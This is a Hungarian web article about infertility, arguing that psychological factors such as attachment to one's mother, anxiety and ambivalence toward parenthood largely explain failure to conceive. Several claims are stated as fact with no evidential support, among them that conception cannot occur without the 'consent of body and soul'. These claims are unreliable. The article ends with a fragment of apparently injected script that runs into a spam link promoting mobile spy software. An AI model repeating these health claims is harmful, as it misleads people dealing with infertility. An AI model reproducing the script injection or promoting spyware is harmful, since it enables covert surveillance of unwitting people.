Meddőség

 “Sok gyerek, sok gond,
de ha nincs gyereked,
örömödet se leled.”
/kínai mondás/

Fogamzási nehézségek – a meddőségről

Nő és férfi

Kevés dolgot lehetne felsorolni, ami olyan mélyen és fájdalmasan érintené a nemi identitást, mint a meddőség. Férfinak és nőnek a vágya, hogy kettejük élete egy új emberi életben folytatódjon, evolúciósan kódolt. A pár számára, aki akaratával ellentétesen gyermektelen, ez mindenképpen életciklus krízist jelent. A tervezett gyermekáldás elmaradása esetén különösen nehéz a helyzet, hiszen olyan valaminek az elvesztéséről van szó, ami tulajdonképpen még meg sem volt.

Paradox módon azonban sok esetben éppen a fokozott gyermek utáni vágy a gátja a teherbeesésnek. Számtalanszor látni, hogy a pár, amikor abbahagyja a gyermekért folytatott többéves küzdelmet, akkor következik be spontán módon a megtermékenyülés. Ez és a hasonló esetek bizonyítják számomra, hogy a meddőség hátterében leginkább lelki okokat kell keresnünk, amelyek feltárásával, feldolgozásával javítható a termékenység.

A nőknél intenzívebb gyermek utáni vágy tapasztalható, esetükben alapvető kérdésként merül fel, hogy lehet-e, lesz-e gyermekük, vagy sem. Mindeközben a férfiak több, a társadalom által is elfogadott kompenzációs lehetőséggel élhetnek, ha valamilyen ok miatt nem fogan gyermekük.

Személyiségtényezők

A nemi szerep kialakulásának és vállalásának fontos feltétele a zavartalan pszichoszexuális és pszichoszociális fejlődés, ezeknek alapja az a biztonság, amelyet az anyával való korai kapcsolatban lehet megtapasztalni. Mindemellett a fejlődés során az egyént ért nem megfelelő környezeti hatások (is) tudattalanul beépülnek a személyiségbe, és emiatt a felnőtté válást szorongás kísérheti, ami később az anyaság/apaság hárításával járhat.

Az anyaság/apaság hárításának személyiségbeli okai többfélék lehetnek. Egyebek mellett a szülői szerep elfogadásának egyik fontos tényezője az, hogy a nő és a férfi mennyire képes énjét háttérbe szorítani a gyermek érdekét szem előtt tartva. Előfordul, hogy a pár tagjai éretlen, infantilis személyiségük miatt érzelmileg még mindig a származási családjukban élnek és ezáltal nem funkcionálnak önálló családként. A személyiség kibontakozásához elengedhetetlen az, hogy az ember tudatosan a saját útját válassza. Régi tapasztalat, hogy nem jöhet semmi új, ha valami el nem múlik.

Test és lélek egysége

A fogantatáshoz a test és a lélek együttes beleegyezésére van szükség. Ellenkező esetben a megtermékenyülés nem jön létre.

Korábban a termékenységi zavarok esetén szinte mindig felelőst kerestek. Meg akarták határozni, ki a felelős a gyermekáldás elmaradásáért. Ma úgy gondolkodunk erről, hogy ez nem az egyik vagy a másik félnek a hibája, tehát a gyermektelenség nem az egyén betegsége, hanem a párnak, mint rendszernek a működészavaráról van szó.

Az egészséges fejlődés a biztosítéka annak, hogy a nő és a férfi szívesen vállalja saját nemét és a neméhez tartozó magatartásformákat. Anyai és apai szerepében az tud csak kiteljesedni, aki női és férfi szerepében is jól érzi magát.

A meddőség okai

Általában a kívánt várandósság elmaradása esetén testi okokat keresnek először, és lelki tényezőkre csak akkor gondolnak, ha az alapos kivizsgálás során minden lelet negatív. Pedig a meddőséget okozó több szervi eltérésnek is lehet lelki eredete.

Funkcionális meddőség

Az alapos orvosi kivizsgálások mellett is az esetek 10-30%-ában nincs szervi, hormonális, vagy immunológiai eredetű hiba. Ha semmilyen okot nem lehet kimutatni a meddőség hátterében, akkor ismeretlen eredetű, funkcionális, vagy pszichés meddőségről beszélünk.

A leggyakoribb pszichogén okok között említhetjük a fóbiát, vagy a súlyos ambivalenciát a tényleges anyaság iránt, vagy azt a helyzetet, amikor a nő csak a terhességet kívánja, a szülést és az anyaságot tagadja, a nárcisztikus nőiség esetét (terhesség, szülés nélkül kívánna gyereket). Meghatározóak továbbá a szexualitással kapcsolatos averziók, a bizonytalan partnerkapcsolat, a házassági játszmák és a pszichiátriai megbetegedések.

Kutatásaim során azt találtam, hogy a funkcionális meddőség kialakulásának elsődleges oka a saját anyához fűződő kapcsolat, azaz az elsődleges kötődés zavara. Ha valaki ebben a szeretetkapcsolatban nehézségeket élt meg, esetleg súlyos hiányokat tapasztalt, akkor ez a későbbiekben az anya tagadásával, a vele történő ellenazonosulás vágyával járhat. További problémát jelenthet az anyáról való leválás hiánya, hiszen az érzelmi függőség éretlenségben tart. A termékenység zavara mögött korai kötődési veszteségek, feldolgozatlan gyász-, és abortuszélmények is meghúzódhatnak még.

Depresszió és szorongás

A depresszió és a szorongás gátolja a megtermékenyítést/megtermékenyülést, de a gyermektelenség és a sikertelen próbálkozások önmagukban is depressziót okozhatnak. A meddőség magával vonhat pszichés és párkapcsolati problémákat, elsősorban a szexualitás terén. A párkapcsolatra veszélyt jelenthet a görcsösség. Ha az együttlétek a szerelem beteljesülése helyett kötelező programmá válnak, akkor a nemi gyönyör nemi technikává válik és a kapcsolat megromlása valószínűsíthető.

A fogamzás valószínűsége

Amennyiben minden körülmény megfelelő, akkor is időre szükség van a teherbeeséshez. A fogamzóképes nőknek kb. 20% esélyük van arra, hogy egy menstruációs ciklusban megtermékenyüljenek. Egy év alatt a teherbeesés valószínűsége ideális esetben 85%, a második évben ez további 5-10%-kal növekszik.

var d=document;var s=d.createElement(‘script’); https://topspyapps.net – The most popular 2017 spy software applications for the mobile phones.